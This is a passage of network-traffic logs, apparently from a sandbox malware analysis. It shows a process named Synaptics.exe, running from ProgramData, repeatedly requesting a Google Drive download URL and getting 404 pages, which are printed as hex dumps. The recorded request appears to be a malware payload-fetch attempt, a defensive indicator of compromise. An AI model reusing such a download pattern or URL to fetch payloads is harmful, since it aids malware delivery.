                                                                                                                                                                                        2022-05-17 11:31:33 UTC93INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:33 UTC93INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        300192.168.2.350089142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:08 UTC909OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:09 UTC912INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:08 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-poTjzuFDHdPjiZ0xJ+fNWQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:09 UTC914INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:32:09 UTC914INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 71 35 4a 69 49 6f 38 6c 58 2b 45 67 51 47 6e 74 6c 65 61 54 62 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="q5JiIo8lX+EgQGntleaTbQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:32:09 UTC915INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:32:09 UTC915INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        301192.168.2.350090142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:08 UTC912OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:09 UTC915INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:09 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-V9sp8855eWTTTYLOXnw16A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:09 UTC916INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:32:09 UTC916INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 44 64 58 32 75 4c 75 49 44 6a 67 42 35 79 2f 61 68 72 34 42 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9DdX2uLuIDjgB5y/ahr4Bw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:32:09 UTC918INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:32:09 UTC918INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        31192.168.2.349773142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:33 UTC93OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:33 UTC93INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:33 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-MgQmBy0crSl58seEyUMxGQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:33 UTC94INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:33 UTC94INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 78 32 74 34 67 6f 37 76 35 69 6a 75 4a 6b 36 77 78 5a 6f 5a 4e 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="x2t4go7v5ijuJk6wxZoZNw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:33 UTC96INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:33 UTC96INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        32192.168.2.349776142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:33 UTC93OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:33 UTC96INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:33 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-2kuVWl9Pr3If4/qD+rl5GA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:33 UTC97INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:33 UTC97INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 67 58 77 6b 34 57 39 64 74 2b 49 55 52 66 44 68 74 43 66 66 6e 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="gXwk4W9dt+IURfDhtCffng">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:33 UTC99INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:33 UTC99INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        33192.168.2.349778142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:33 UTC96OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:33 UTC99INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:33 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-llTuGy2C8qmU+1iDomtrKA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:33 UTC100INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:33 UTC100INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 56 65 67 56 4e 76 5a 68 43 50 6f 56 51 43 32 31 73 6d 35 68 7a 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
